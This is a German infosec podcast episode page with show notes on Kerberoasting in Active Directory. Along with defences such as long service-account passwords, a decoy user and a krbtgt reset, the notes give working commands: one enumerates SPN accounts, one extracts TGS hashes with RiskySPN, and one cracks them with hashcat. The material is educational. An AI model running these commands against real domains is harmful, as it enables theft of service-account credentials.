Episode 4 - Kerberoasting

Episode 4 - Kerberoasting

19 Minuten

Beschreibung

vor 3 Jahren
In der 4. Episode des Podcast "Spaziergang mit Sicherheit" wird das
Thema Kerberoasting behandelt
Kerberoshttps://de.wikipedia.org/wiki/Kerberos_(Protokoll)
Kerberoastinghttps://adsecurity.org/?p=3458 Ablauf Angriffmit dem
folgenden Powershell Befehl (aus dem Active Directory Modul) können
Zielbenutzer für den Kerberoasting Angriff identifiziert werden:
Get-Aduser -filter {ServicePrinicpalName -ne "$null"} -Properties
ServicePrincipalName https://github.com/cyberark/RiskySPN
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher
-Format "Hashcat" | Out-File hashes.txt hashcat.exe -m13100 -a0
hashes.txt -o hashes.out rockyou.txt -r OneRuleToRuleThemAll.rule
Benchmark Hashcat für p3dn.24xlarge
https://github.com/javydekoning/aws-hashcat/blob/master/p3dn.24xlarge.v6.1.1-120-g15bf8b730.cuda.txt
https://duckduckgo.com/?q=+!password+28+strong Warum 28 Zeichen
Passwortlänge für
Servicebenutzerhttps://room362.com/post/2017/05-06-2017-password-magic-numbers/ 
Hausaufgabe der Episode das ThemaEinrichten des
Köderbenutzershttps://adsecurity.org/?p=3513   Ändern des
Passwort des Benutzer
krbtgthttps://docs.microsoft.com/en-us/answers/questions/87978/reset-krbtgt-password.html
Deutschsprachige Seite
https://www.der-windows-papst.de/2019/07/03/krbtgt-password-reset/
  Kontakthttps://twitter.com/spaziergangs
www.infosec-podcast.de   Musik: Goto80 and the Uwe Schenk Band
- Cable Swingin' Ferret (lizensiert unter CC0 1.0 Universal
License)

Kommentare (0)

Lade Inhalte...
15
15
:
: